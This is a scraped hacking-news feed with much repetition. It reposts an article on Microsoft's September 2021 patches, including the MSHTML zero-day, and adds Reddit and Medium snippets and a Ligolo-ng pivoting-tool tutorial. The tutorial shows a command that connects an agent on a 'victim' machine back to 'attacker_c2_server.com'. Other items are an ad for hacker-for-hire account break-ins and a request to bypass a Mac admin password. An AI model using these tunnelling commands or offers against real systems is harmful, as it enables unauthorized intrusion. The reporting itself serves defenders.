Hacking Articles Tips Tricks Videos Tutorials
Photo
Black Hat Ethical Hacking
Microsoft Patches Actively Exploited Windows Zero-Day Bug
https://www.blackhatethicalhacking.com/wp-content/uploads/2021/08/Untitled-design-2-1.png Microsoft Patches Actively Exploited Windows Zero-Day BugPost Views: 286
Reading Time: 2 Minutes
In September’s Patch Tuesday crop of security fixes, Microsoft released patches for 66 CVEs, three of which are rated critical, and one of which – the Windows MSHTML zero-day – has been under active attack for nearly two weeks.
One other bug is listed as publicly known but isn’t (yet) being exploited. Immersive Labs’ Kevin Breen, director of cyber threat research, observed that with only one CVE under active attack in the wild, it’s “quite a light Patch Tuesday” – at least on the surface, that is.
The flaws were found in Microsoft Windows and Windows components, Microsoft Edge (Chromium, iOS, and Android), Azure, Office and Office Components, SharePoint Server, Microsoft Windows DNS and the Windows Subsystem for Linux.
Of the 66 new CVEs patched today, three are rated critical, 62 are rated important, and one is rated moderate in severity.
Over the past nine months of 2021, this is the seventh month in which Microsoft patched fewer than 100 CVEs, in stark contrast to 2020, when Redmond spent eight months gushing out more than 100 CVE patches per month. But while the overall number of vulnerabilities is lighter, the severity ratings have ticked up, as the Zero Day Initiative noted.
Some observers pegged the top patching priority in this month’s batch as being a fix for CVE-2021-40444: An important-rated vulnerability in Microsoft’s MSHTML (Trident) engine that rates 8.8 out of 10 on the CVSS scale.
Disclosed on Sept. 7, it’s a painfully throbbing sore thumb, given that researchers developed a number of proof-of-concept (PoC) exploits showing how drop-dead simple it is to exploit, and attackers have been sharing guides on how to do just that.
See Also: Complete Offensive Security and Ethical Hacking Course Under Active Attack: CVE-2021-40444It’s been nearly two weeks since this serious, simple to exploit bug has been under active attack, and it’s been nearly a week since attackers started to share blueprints on how to carry out an exploit.
Microsoft said last week that the flaw could let an attacker “craft a malicious ActiveX control to be used by a Microsoft Office document that hosts the browser rendering engine,” after which “the attacker would then have to convince the user to open the malicious document.” Unfortunately, malicious macro attacks continue to be prevalent: In July, for example, legacy users of Microsoft Excel were being targeted in a malware campaign that used a novel malware-obfuscation technique to disable malicious macro warnings and deliver the ZLoader trojan.
An attacker would need to convince a user to open a specially crafted Microsoft Office document containing the exploit code.
Satnam Narang, staff research engineer at Tenable, noted via email that there have been warnings that this vulnerability will be incorporated into malware payloads and used to distribute ransomware: A solid reason to put the patch at the top of your priority list.
“There are no indications that this has happened yet, but with the patch now available, organizations should prioritize updating their systems as soon as possible,” Narang told Threatpost.
Last Wednesday, Sept. 8, Kevin Beaumont – head of the security operations center for U.K. fashion retailer Arcadia Group and a past senior threat intelligence analyst at Microsoft – noted that the exploit had been in the wild for about a week or more.
It got worse: Last Thursday, Sept. 9, threat actors began sharing exploit h[...]
Microsoft Patches Actively Exploited Windows Zero-Day Bug
https://www.blackhatethicalhacking.com/wp-content/uploads/2021/08/Untitled-design-2-1.png Microsoft Patches Actively Exploited Windows Zero-Day BugPost Views: 286
Reading Time: 2 Minutes
In September’s Patch Tuesday crop of security fixes, Microsoft released patches for 66 CVEs, three of which are rated critical, and one of which – the Windows MSHTML zero-day – has been under active attack for nearly two weeks.
One other bug is listed as publicly known but isn’t (yet) being exploited. Immersive Labs’ Kevin Breen, director of cyber threat research, observed that with only one CVE under active attack in the wild, it’s “quite a light Patch Tuesday” – at least on the surface, that is.
The flaws were found in Microsoft Windows and Windows components, Microsoft Edge (Chromium, iOS, and Android), Azure, Office and Office Components, SharePoint Server, Microsoft Windows DNS and the Windows Subsystem for Linux.
Of the 66 new CVEs patched today, three are rated critical, 62 are rated important, and one is rated moderate in severity.
Over the past nine months of 2021, this is the seventh month in which Microsoft patched fewer than 100 CVEs, in stark contrast to 2020, when Redmond spent eight months gushing out more than 100 CVE patches per month. But while the overall number of vulnerabilities is lighter, the severity ratings have ticked up, as the Zero Day Initiative noted.
Some observers pegged the top patching priority in this month’s batch as being a fix for CVE-2021-40444: An important-rated vulnerability in Microsoft’s MSHTML (Trident) engine that rates 8.8 out of 10 on the CVSS scale.
Disclosed on Sept. 7, it’s a painfully throbbing sore thumb, given that researchers developed a number of proof-of-concept (PoC) exploits showing how drop-dead simple it is to exploit, and attackers have been sharing guides on how to do just that.
See Also: Complete Offensive Security and Ethical Hacking Course Under Active Attack: CVE-2021-40444It’s been nearly two weeks since this serious, simple to exploit bug has been under active attack, and it’s been nearly a week since attackers started to share blueprints on how to carry out an exploit.
Microsoft said last week that the flaw could let an attacker “craft a malicious ActiveX control to be used by a Microsoft Office document that hosts the browser rendering engine,” after which “the attacker would then have to convince the user to open the malicious document.” Unfortunately, malicious macro attacks continue to be prevalent: In July, for example, legacy users of Microsoft Excel were being targeted in a malware campaign that used a novel malware-obfuscation technique to disable malicious macro warnings and deliver the ZLoader trojan.
An attacker would need to convince a user to open a specially crafted Microsoft Office document containing the exploit code.
Satnam Narang, staff research engineer at Tenable, noted via email that there have been warnings that this vulnerability will be incorporated into malware payloads and used to distribute ransomware: A solid reason to put the patch at the top of your priority list.
“There are no indications that this has happened yet, but with the patch now available, organizations should prioritize updating their systems as soon as possible,” Narang told Threatpost.
Last Wednesday, Sept. 8, Kevin Beaumont – head of the security operations center for U.K. fashion retailer Arcadia Group and a past senior threat intelligence analyst at Microsoft – noted that the exploit had been in the wild for about a week or more.
It got worse: Last Thursday, Sept. 9, threat actors began sharing exploit h[...]
Hacking Articles Tips Tricks Videos Tutorials
Black Hat Ethical Hacking Microsoft Patches Actively Exploited Windows Zero-Day Bug https://www.blackhatethicalhacking.com/wp-content/uploads/2021/08/Untitled-design-2-1.png Microsoft Patches Actively Exploited Windows Zero-Day BugPost Views: 286 Reading…
ow-tos and PoCs for the Windows MSHTML zero-day. BleepingComputer gave it a try and found that the guides are “simple to follow and [allow] anyone to create their own working version” of the exploit, “including a Python server to distribute the malicious documents and CAB files.”
It took the publication all of 15 minutes to recreate the exploit.
A week ago, on Tuesday, Sept. 7, Microsoft and the Cybersecurity and Infrastructure Security Agency (CISA) had urged mitigations of the remote-code execution (RCE) flaw, which is found in all modern Windows operating systems.
Last week, the company didn’t say much about the bug in MSHTML, aka Trident, which is the HTML engine built into Windows since Internet Explorer debuted more than 20 years ago and which allows Windows to read and display HTML files.
Microsoft did say, however, that it was aware of targeted attacks trying to exploit it via specially crafted Microsoft Office documents.
In spite of there being no security updates available for the vulnerability at that time, MIcrosoft went ahead and disclosed it, along with mitigations meant to help prevent exploitation.
See Also: Windows MSHTML zero-day defenses bypassed as new info emerges Mitigations That Don’t MitigateTracked as CVE-2021-40444, the flaw is serious enough that CISA sent its own advisory, alerting users and administrators and recommending that they use the mitigations and workarounds Microsoft recommended – mitigations that try to prevent exploitation by blocking ActiveX controls and Word/RTF document previews in Windows Explorer.
Emphasis on “try to:” Unfortunately, those mitigations proved to be less than foolproof, as researchers, including Beaumont, managed to modify the exploit so that it didn’t use ActiveX, effectively skirting Microsoft’s mitigations.
The Zero Day Initiative said that for now, the most-effective defense is “to apply the patch and avoid Office docs you aren’t expecting to receive.”
Be sure to carefully review and install all the needed patches for your setup: There’s a long list of updates for specific platforms, and it’s important not to slather on too thin a layer of protection.
Credit for finding this bug goes to Rick Cole of MSTIC; Bryce Abdo, Dhanesh Kizhakkinan and Genwei Jiang, all from Mandiant; and Haifei Li of EXPMON. Baddest Bug AwardThe award for baddest bug – or at least, the one with the highest severity rating, with a CVSS score of 9.8 – goes to CVE-2021-38647: a critical remote-code execution (RCE) vulnerability in Open Management Infrastructure. OMI is an open-source project to further the development of a production-quality implementation of the DMTF CIM/WBEM standards.
“This vulnerability requires no user interaction or privileges, so an attacker can run their code on an affected system just by sending a specially crafted message to an affected system,” the Zero Day Initiatve explained. That makes it high priority: ZDI recommended that OMI users test and deploy this one quickly.
See Also: Offensive Security Tool: Jenkins Attack Framework Yet More PrintNightmare PatchesMicrosoft also patched three elevation of privilege vulnerabilities in Windows Print Spooler (CVE-2021-38667, CVE-2021-38671 and CVE-2021-40447), all rated important.
These are the three latest fixes in a steady stream of patches for flaws in Windows Print Spooler that followed the disclosure of PrintNightmare in June. This probably won’t be the last patch in that parade: Tenable’s Narang told Threatpost that “researchers continue to discover ways to exploit Print Spooler” and that the firm expects “continued research in this area.”
Only one – CVE-2021-38671 – of today’s patch trio is rated as “exploitation more likely.” Regardless, organizations should prioritize patching these flaws as “they are extremely valuable to attackers in post-exploitation scenarios,” Narang observed. More ‘Exploitation More Likely’Immersive’s Breen told Thre[...]
It took the publication all of 15 minutes to recreate the exploit.
A week ago, on Tuesday, Sept. 7, Microsoft and the Cybersecurity and Infrastructure Security Agency (CISA) had urged mitigations of the remote-code execution (RCE) flaw, which is found in all modern Windows operating systems.
Last week, the company didn’t say much about the bug in MSHTML, aka Trident, which is the HTML engine built into Windows since Internet Explorer debuted more than 20 years ago and which allows Windows to read and display HTML files.
Microsoft did say, however, that it was aware of targeted attacks trying to exploit it via specially crafted Microsoft Office documents.
In spite of there being no security updates available for the vulnerability at that time, MIcrosoft went ahead and disclosed it, along with mitigations meant to help prevent exploitation.
See Also: Windows MSHTML zero-day defenses bypassed as new info emerges Mitigations That Don’t MitigateTracked as CVE-2021-40444, the flaw is serious enough that CISA sent its own advisory, alerting users and administrators and recommending that they use the mitigations and workarounds Microsoft recommended – mitigations that try to prevent exploitation by blocking ActiveX controls and Word/RTF document previews in Windows Explorer.
Emphasis on “try to:” Unfortunately, those mitigations proved to be less than foolproof, as researchers, including Beaumont, managed to modify the exploit so that it didn’t use ActiveX, effectively skirting Microsoft’s mitigations.
The Zero Day Initiative said that for now, the most-effective defense is “to apply the patch and avoid Office docs you aren’t expecting to receive.”
Be sure to carefully review and install all the needed patches for your setup: There’s a long list of updates for specific platforms, and it’s important not to slather on too thin a layer of protection.
Credit for finding this bug goes to Rick Cole of MSTIC; Bryce Abdo, Dhanesh Kizhakkinan and Genwei Jiang, all from Mandiant; and Haifei Li of EXPMON. Baddest Bug AwardThe award for baddest bug – or at least, the one with the highest severity rating, with a CVSS score of 9.8 – goes to CVE-2021-38647: a critical remote-code execution (RCE) vulnerability in Open Management Infrastructure. OMI is an open-source project to further the development of a production-quality implementation of the DMTF CIM/WBEM standards.
“This vulnerability requires no user interaction or privileges, so an attacker can run their code on an affected system just by sending a specially crafted message to an affected system,” the Zero Day Initiatve explained. That makes it high priority: ZDI recommended that OMI users test and deploy this one quickly.
See Also: Offensive Security Tool: Jenkins Attack Framework Yet More PrintNightmare PatchesMicrosoft also patched three elevation of privilege vulnerabilities in Windows Print Spooler (CVE-2021-38667, CVE-2021-38671 and CVE-2021-40447), all rated important.
These are the three latest fixes in a steady stream of patches for flaws in Windows Print Spooler that followed the disclosure of PrintNightmare in June. This probably won’t be the last patch in that parade: Tenable’s Narang told Threatpost that “researchers continue to discover ways to exploit Print Spooler” and that the firm expects “continued research in this area.”
Only one – CVE-2021-38671 – of today’s patch trio is rated as “exploitation more likely.” Regardless, organizations should prioritize patching these flaws as “they are extremely valuable to attackers in post-exploitation scenarios,” Narang observed. More ‘Exploitation More Likely’Immersive’s Breen told Thre[...]
Hacking Articles Tips Tricks Videos Tutorials
ow-tos and PoCs for the Windows MSHTML zero-day. BleepingComputer gave it a try and found that the guides are “simple to follow and [allow] anyone to create their own working version” of the exploit, “including a Python server to distribute the malicious documents…
atpost that a trio of local privilege-escalation vulnerabilities in the Windows Common Log File System Driver (CVE-2021-36955, CVE-2021-36963, CVE-2021-38633) are also noteworthy, all of them being listed as “exploitation more likely.”
“Local priv-esc vulnerabilities are a key component of almost every successful cyberattack, especially for the likes of ransomware operators who abuse this kind of exploit to gain the highest level of access,” Breen said via email. “This allows them to disable antivirus, delete backups and ensure their encryptors can reach even the most sensitive of files.”
One glaring example of that emerged in May, when hundreds of millions of Dell users were found to be at risk from kernel-privilege bugs. The bugs lurked undisclosed for 12 years, and could have allowed attackers to bypass security products, execute code and pivot to other parts of the network for lateral movement.
The three exploits Microsoft patched on Tuesday aren’t remote, meaning that attackers need to have achieved code execution by other means. One such way would be via CVE-2021-40444.
Two other vulnerabilities – CVE-2021-38639 and CVE-2021-36975, both Win32k escalation of privilege flaws – have also been listed as “exploitation more likely” and, together, cover the full range of supported Windows versions.
Breen said that he’s starting to feel like a broken record when it comes to privilege escalation vulnerabilities. They’re not rated as high a severity risk as RCE bugs, but “these local exploits can be the linchpin in the post-exploitation phases of an experienced attacker,” he asserted. “If you can block them here you have the potential to significantly limit their damage.”
he added, “If we assume a determined attacker will be able to infect a victim’s device through social engineering or other techniques, I would argue that patching priv-esc vulnerabilities is even more important than patching some other remote code-execution vulns,” Breen said. See Also: Hacking Stories: Andrian Lamo – The ‘homeless’ HackerStill, This RCE Is Pretty ImportantDanny Kim, a principal architect at Virsec who spent time at Microsoft during his graduate work on the OS security development team, wants security teams to pay attention to CVE-2021-36965 – an important-rated Windows WLAN AutoConfig Service RCE vulnerability – given its combination of severity (with a CVSS:3.0 base score of 8.8); no requirement for privilege escalation/user interaction to exploit; and breadth of affected Windows versions.
The WLAN AutoConfig Service is part of the mechanism that Windows 10 uses to choose the wireless network a computer will connect to, and to the Windows Scripting Engine, respectively.
The patch fixes a flaw that could allow network-adjacent attackers to run their code on affected systems at system level.
As the Zero Day Initiative explained, that means an attacker could “completely take over the target – provided they are on an adjacent network.” That would come in quite handy in a coffee-shop attack, where multiple people use an unsecured Wi-Fi network.
This one “is especially alarming,” Kim said: Think SolarWinds and PrintNightmare.
“As recent trends have shown, remote code execution-based attacks are the most critical vulnerabilities that can lead to the largest negative impact on an enterprise, as we have seen in the Solarwinds and PrintNightmare attacks,” he said in an email.
Kim said that in spite of the exploit code maturity being currently unproven, the vulnerability has been confirmed to exist, leaving an opening for attackers.
“It specifically relies on the attacker being located in the same network, so it would not be surprising to see this vulnerability used in combination with another CVE/attack to achieve an attacker’s end goal,” he predicted. “Remote code execution attacks can lead to unverified processes running on the server workload, only highlighting the need for constant, deter[...]
“Local priv-esc vulnerabilities are a key component of almost every successful cyberattack, especially for the likes of ransomware operators who abuse this kind of exploit to gain the highest level of access,” Breen said via email. “This allows them to disable antivirus, delete backups and ensure their encryptors can reach even the most sensitive of files.”
One glaring example of that emerged in May, when hundreds of millions of Dell users were found to be at risk from kernel-privilege bugs. The bugs lurked undisclosed for 12 years, and could have allowed attackers to bypass security products, execute code and pivot to other parts of the network for lateral movement.
The three exploits Microsoft patched on Tuesday aren’t remote, meaning that attackers need to have achieved code execution by other means. One such way would be via CVE-2021-40444.
Two other vulnerabilities – CVE-2021-38639 and CVE-2021-36975, both Win32k escalation of privilege flaws – have also been listed as “exploitation more likely” and, together, cover the full range of supported Windows versions.
Breen said that he’s starting to feel like a broken record when it comes to privilege escalation vulnerabilities. They’re not rated as high a severity risk as RCE bugs, but “these local exploits can be the linchpin in the post-exploitation phases of an experienced attacker,” he asserted. “If you can block them here you have the potential to significantly limit their damage.”
he added, “If we assume a determined attacker will be able to infect a victim’s device through social engineering or other techniques, I would argue that patching priv-esc vulnerabilities is even more important than patching some other remote code-execution vulns,” Breen said. See Also: Hacking Stories: Andrian Lamo – The ‘homeless’ HackerStill, This RCE Is Pretty ImportantDanny Kim, a principal architect at Virsec who spent time at Microsoft during his graduate work on the OS security development team, wants security teams to pay attention to CVE-2021-36965 – an important-rated Windows WLAN AutoConfig Service RCE vulnerability – given its combination of severity (with a CVSS:3.0 base score of 8.8); no requirement for privilege escalation/user interaction to exploit; and breadth of affected Windows versions.
The WLAN AutoConfig Service is part of the mechanism that Windows 10 uses to choose the wireless network a computer will connect to, and to the Windows Scripting Engine, respectively.
The patch fixes a flaw that could allow network-adjacent attackers to run their code on affected systems at system level.
As the Zero Day Initiative explained, that means an attacker could “completely take over the target – provided they are on an adjacent network.” That would come in quite handy in a coffee-shop attack, where multiple people use an unsecured Wi-Fi network.
This one “is especially alarming,” Kim said: Think SolarWinds and PrintNightmare.
“As recent trends have shown, remote code execution-based attacks are the most critical vulnerabilities that can lead to the largest negative impact on an enterprise, as we have seen in the Solarwinds and PrintNightmare attacks,” he said in an email.
Kim said that in spite of the exploit code maturity being currently unproven, the vulnerability has been confirmed to exist, leaving an opening for attackers.
“It specifically relies on the attacker being located in the same network, so it would not be surprising to see this vulnerability used in combination with another CVE/attack to achieve an attacker’s end goal,” he predicted. “Remote code execution attacks can lead to unverified processes running on the server workload, only highlighting the need for constant, deter[...]
Hacking Articles Tips Tricks Videos Tutorials
atpost that a trio of local privilege-escalation vulnerabilities in the Windows Common Log File System Driver (CVE-2021-36955, CVE-2021-36963, CVE-2021-38633) are also noteworthy, all of them being listed as “exploitation more likely.” “Local priv-esc vulnerabilities…
ministic runtime monitoring. Without this protection in place, RCE attacks can lead to a total loss of confidentiality and integrity of an enterprise’s data.”
The Zero Day Initiative also found this one alarming. Even though it requires proximity to a target, it requires no privileges or user interaction, so “don’t let the adjacent aspect of this bug diminish the severity,” it said. “Definitely test and deploy this patch quickly.” And Don’t Forget to Patch ChromeBreen told Threatpost via email that security teams should also pay attention to 25 vulnerabilities patched in Chrome and ported over to Microsoft’s Chromium-based Edge.
Browsers are, after all, windows into things both private, sensitive and valuable to criminals, he said.
“I cannot underestimate the importance of patching your browsers and keeping them up to date,” he stressed. “After all, browsers are the way we interact with the internet and web-based services that contain all sorts of highly sensitive, valuable and private information. Whether you’re thinking about your online banking or the data collected and stored by your organization’s web apps, they could all be exposed by attacks that exploit the browser.”
Source: threatpost.com (Click Link)Recent News* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/09/Google-Chrome-Browser-90x90.jpg Pair of Google Chrome Zero-Day Bugs Actively Exploited19 hours ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/09/banner-2021.3-release-90x90.jpg Kali Linux 2021.3 released: Kali NetHunter on a smartwatch, wider OpenSSL compatibility, new tools1 day ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/09/Apple-marketing-communications-mix-90x90.jpg Apple Issues Emergency Fix for NSO Zero-Click Zero Day3 days ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/09/zeroday-90x90.png Windows MSHTML zero-day exploits shared on hacking forums4 days ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/09/microsoft-zero-day-vulnerabilities-800x358-1-90x90.png Windows MSHTML zero-day defenses bypassed as new info emerges7 days ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/09/Malware-90x90.jpg Microsoft shares temp fix for ongoing Office 365 zero-day attacks1 week ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/09/Jenkins-90x90.jpg Jenkins project’s Confluence server hacked to mine Monero1 week ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/09/unnamed-e1630998483665-90x90.jpg Critical Auth Bypass Bug Affect NETGEAR Smart Switches1 week ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/09/loyalty-card-90x90.jpg Brute-Force Attacks Target Inboxes for Gift Card Data2 weeks ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/09/Braktooth-New-Bluetooth-gaps-threaten-countless-devices-1024x576-1-90x90.jpg Bluetooth Bugs Open Billions of Devices to DoS, Code Execution2 weeks ago
The post Microsoft Patches Actively Exploited Windows Zero-Day Bug first appeared on Black Hat Ethical Hacking.
The Zero Day Initiative also found this one alarming. Even though it requires proximity to a target, it requires no privileges or user interaction, so “don’t let the adjacent aspect of this bug diminish the severity,” it said. “Definitely test and deploy this patch quickly.” And Don’t Forget to Patch ChromeBreen told Threatpost via email that security teams should also pay attention to 25 vulnerabilities patched in Chrome and ported over to Microsoft’s Chromium-based Edge.
Browsers are, after all, windows into things both private, sensitive and valuable to criminals, he said.
“I cannot underestimate the importance of patching your browsers and keeping them up to date,” he stressed. “After all, browsers are the way we interact with the internet and web-based services that contain all sorts of highly sensitive, valuable and private information. Whether you’re thinking about your online banking or the data collected and stored by your organization’s web apps, they could all be exposed by attacks that exploit the browser.”
Source: threatpost.com (Click Link)Recent News* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/09/Google-Chrome-Browser-90x90.jpg Pair of Google Chrome Zero-Day Bugs Actively Exploited19 hours ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/09/banner-2021.3-release-90x90.jpg Kali Linux 2021.3 released: Kali NetHunter on a smartwatch, wider OpenSSL compatibility, new tools1 day ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/09/Apple-marketing-communications-mix-90x90.jpg Apple Issues Emergency Fix for NSO Zero-Click Zero Day3 days ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/09/zeroday-90x90.png Windows MSHTML zero-day exploits shared on hacking forums4 days ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/09/microsoft-zero-day-vulnerabilities-800x358-1-90x90.png Windows MSHTML zero-day defenses bypassed as new info emerges7 days ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/09/Malware-90x90.jpg Microsoft shares temp fix for ongoing Office 365 zero-day attacks1 week ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/09/Jenkins-90x90.jpg Jenkins project’s Confluence server hacked to mine Monero1 week ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/09/unnamed-e1630998483665-90x90.jpg Critical Auth Bypass Bug Affect NETGEAR Smart Switches1 week ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/09/loyalty-card-90x90.jpg Brute-Force Attacks Target Inboxes for Gift Card Data2 weeks ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/09/Braktooth-New-Bluetooth-gaps-threaten-countless-devices-1024x576-1-90x90.jpg Bluetooth Bugs Open Billions of Devices to DoS, Code Execution2 weeks ago
The post Microsoft Patches Actively Exploited Windows Zero-Day Bug first appeared on Black Hat Ethical Hacking.
hacking: security in practice
Where are data breaches deposited/available from?
Apple just informed me that one of my accounts was found in a data breach. Where is this data coming from?
submitted by /u/DarwinApprentice
[link] [comments]
➖ Sent by @TheFeedReaderBot ➖
Where are data breaches deposited/available from?
Apple just informed me that one of my accounts was found in a data breach. Where is this data coming from?
submitted by /u/DarwinApprentice
[link] [comments]
➖ Sent by @TheFeedReaderBot ➖
reddit
Where are data breaches deposited/available from?
Apple just informed me that one of my accounts was found in a data breach. Where is this data coming from?
hacking: security in practice
Bypass mac admin password without resetting it?
Looking for a way to gain access to macbook pro admin user without resetting the password. Any information would be appreciated!
submitted by /u/JDDW
[link] [comments]
Bypass mac admin password without resetting it?
Looking for a way to gain access to macbook pro admin user without resetting the password. Any information would be appreciated!
submitted by /u/JDDW
[link] [comments]
reddit
Bypass mac admin password without resetting it?
Looking for a way to gain access to macbook pro admin user without resetting the password. Any information would be appreciated!
Hacking on Medium
Exploiting the Dev VM
Machine Info
IP Address: 192.168.48.132
MAC Address: 00:0c:29:a9:5c:06
Continue reading on Medium »
Exploiting the Dev VM
Machine Info
IP Address: 192.168.48.132
MAC Address: 00:0c:29:a9:5c:06
Continue reading on Medium »
Hacking on Medium
DXventures grants $100,000 to Hats.finance to build a decentralized cyber security network
DXventures is the internal venture arm of DXdao.
Continue reading on Medium »
DXventures grants $100,000 to Hats.finance to build a decentralized cyber security network
DXventures is the internal venture arm of DXdao.
Continue reading on Medium »
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Investigate & Monitor Mobile Phone, Hack Facebook, WhatsApp, Instagram, Gmail, Legit Cyber Hacker…
Hello everyone, If you want to hire a reliable hacker to help you hack and program access into any device, system, website, Bitcoin site…
Continue reading on Medium »
Investigate & Monitor Mobile Phone, Hack Facebook, WhatsApp, Instagram, Gmail, Legit Cyber Hacker…
Hello everyone, If you want to hire a reliable hacker to help you hack and program access into any device, system, website, Bitcoin site…
Continue reading on Medium »
Bug Bounty is a program offered by many websites, organizations, and app developers to report bugs on their apps or websites. Those kinds…Continue reading on Medium » (https://medium.com/@vimukumarasiri/what-is-bug-bounty-20afa920ea02?source=rss------bug_bounty-5)
Beyond rubber ducky: evil mass storage POC with AT90USBKEY2. malware-tool for offline system. USB composite device with keyboard + mass storage + exfiltration via radio.
https://www.reddit.com/r/redteamsec/comments/ppv1yd/beyond_rubber_ducky_evil_mass_storage_poc_with/
submitted by /u/gid0rah (https://www.reddit.com/user/gid0rah)
[link] (https://www.driverentry.com/node/104) [comments] (https://www.reddit.com/r/redteamsec/comments/ppv1yd/beyond_rubber_ducky_evil_mass_storage_poc_with/)
https://www.reddit.com/r/redteamsec/comments/ppv1yd/beyond_rubber_ducky_evil_mass_storage_poc_with/
submitted by /u/gid0rah (https://www.reddit.com/user/gid0rah)
[link] (https://www.driverentry.com/node/104) [comments] (https://www.reddit.com/r/redteamsec/comments/ppv1yd/beyond_rubber_ducky_evil_mass_storage_poc_with/)
What is Bug Bounty
Bug Bounty is a program offered by many websites, organizations, and app developers to report bugs on their apps or websites. Those kinds…Continue reading on Medium »
Read more...
Bug Bounty is a program offered by many websites, organizations, and app developers to report bugs on their apps or websites. Those kinds…Continue reading on Medium »
Read more...
Hacking Articles Tips Tricks Videos Tutorials
Photo
Kali Linux TutorialsLigolo-Ng : An Advanced, Yet Simple, Tunneling/Pivoting Tool That Uses A TUN Interface
Ligolo-Ng is a simple, lightweight and fast tool that allows pentesters to establish tunnels from a reverse TCP/TLS connection without the need of SOCKS.
Features
* Tun interface (No more SOCKS!)
* Simple UI with agent selection and network information
* Easy to use and setup
* Automatic certificate configuration with Let’s Encrypt
* Performant (Multiplexing)
* Does not require high privileges
* Socket listening/binding on the agent
* Multiple platforms supported for the agent
How Is This Different From Ligolo/Chisel/Meterpreter… ?
Instead of using a SOCKS proxy or TCP/UDP forwarders, Ligolo-ng creates a userland network stack using Gvisor.
When running the relay/proxy server, a tun interface is used, packets sent to this interface are translated, and then transmitted to the agent remote network.
As an example, for a TCP connection:
* SYN are translated to connect() on remote
* SYN-ACK is sent back if connect() succeed
* RST is sent if ECONNRESET, ECONNABORTED or ECONNREFUSED syscall are returned after connect
* Nothing is sent if timeout
This allows running tools like nmap without the use of proxychains (simpler and faster).
Building & Usage
Building Ligolo-ng
Building ligolo-ng:
$go build -o agent cmd/agent/main.go
$go build -o proxy cmd/proxy/main.go
#Build agent for Windows
$GOOS=windows go build -o agent.exe cmd/agent/main.go
Setup Ligolo-ng
Start the proxy server on your Command and Control (C2) server (default 11601 listening will be use):
$ sudo ip tuntap add user [your_username] mode tun ligolo
$ sudo ip link set ligolo up
$ ./proxy -h # Help options
$ ./proxy -autocert # Automatically request LetsEncrypt certificates
TLS Options
Using Let’s Encrypt Autocert
When using the
Port 80 needs to be accessible for Let’s Encrypt certificate validation/retrieval
Using your own TLS certificates
If you want to use your own certificates for the proxy server, you can use the
Automatic self-signed certificates (NOT RECOMMENDED)
The proxy/relay can automatically generate self-signed TLS certificates using the
The
Beware of man-in-the-middle attacks! This option should only be used in a test environment or for debugging purposes.
Using Ligolo-ng
Start the agent on your target (victim) computer (no privileges are required!):
$ ./agent -connect attacker_c2_server.com:11601
A session should appear on the proxy server.
INFO[0102] Agent joined. name=nchatelain@nworkstation remote=”XX.XX.XX.XX:38000″
Use the
ligolo-ng » session
? Specify a session : 1 – nchatelain@nworkstation – XX.XX.XX.XX:38000
Display the network configuration of the agent using the
[Agent : nchatelain@nworkstation] » ifconfig
[…]
┌─────────────────────────────────────────────┐
│ Interface 3 │
├──────────────┬──────────────────────────────┤
│ Name │ wlp3s0 │
│ Hardware MAC │ de:ad:be:ef:ca:fe │
│ MTU │ 1500 │
│ Flags │ up|broadcast|multicast │
│ IPv4 Address │ 192.168.0.30/24 │
└──────────────┴──────────────────────────────┘
Add a route on the proxy/relay server to the 192.168.0.0/24 agent network.[...]
Ligolo-Ng is a simple, lightweight and fast tool that allows pentesters to establish tunnels from a reverse TCP/TLS connection without the need of SOCKS.
Features
* Tun interface (No more SOCKS!)
* Simple UI with agent selection and network information
* Easy to use and setup
* Automatic certificate configuration with Let’s Encrypt
* Performant (Multiplexing)
* Does not require high privileges
* Socket listening/binding on the agent
* Multiple platforms supported for the agent
How Is This Different From Ligolo/Chisel/Meterpreter… ?
Instead of using a SOCKS proxy or TCP/UDP forwarders, Ligolo-ng creates a userland network stack using Gvisor.
When running the relay/proxy server, a tun interface is used, packets sent to this interface are translated, and then transmitted to the agent remote network.
As an example, for a TCP connection:
* SYN are translated to connect() on remote
* SYN-ACK is sent back if connect() succeed
* RST is sent if ECONNRESET, ECONNABORTED or ECONNREFUSED syscall are returned after connect
* Nothing is sent if timeout
This allows running tools like nmap without the use of proxychains (simpler and faster).
Building & Usage
Building Ligolo-ng
Building ligolo-ng:
$go build -o agent cmd/agent/main.go
$go build -o proxy cmd/proxy/main.go
#Build agent for Windows
$GOOS=windows go build -o agent.exe cmd/agent/main.go
Setup Ligolo-ng
Start the proxy server on your Command and Control (C2) server (default 11601 listening will be use):
$ sudo ip tuntap add user [your_username] mode tun ligolo
$ sudo ip link set ligolo up
$ ./proxy -h # Help options
$ ./proxy -autocert # Automatically request LetsEncrypt certificates
TLS Options
Using Let’s Encrypt Autocert
When using the
-autocert option, the proxy will automatically request a certificate (using Let’s Encrypt) for attacker_c2_server.com when an agent connects.Port 80 needs to be accessible for Let’s Encrypt certificate validation/retrieval
Using your own TLS certificates
If you want to use your own certificates for the proxy server, you can use the
-certfile and -keyfile parameters.Automatic self-signed certificates (NOT RECOMMENDED)
The proxy/relay can automatically generate self-signed TLS certificates using the
-selfcert option.The
-ignore-cert option needs to be used with the agent.Beware of man-in-the-middle attacks! This option should only be used in a test environment or for debugging purposes.
Using Ligolo-ng
Start the agent on your target (victim) computer (no privileges are required!):
$ ./agent -connect attacker_c2_server.com:11601
A session should appear on the proxy server.
INFO[0102] Agent joined. name=nchatelain@nworkstation remote=”XX.XX.XX.XX:38000″
Use the
session command to select the agent.ligolo-ng » session
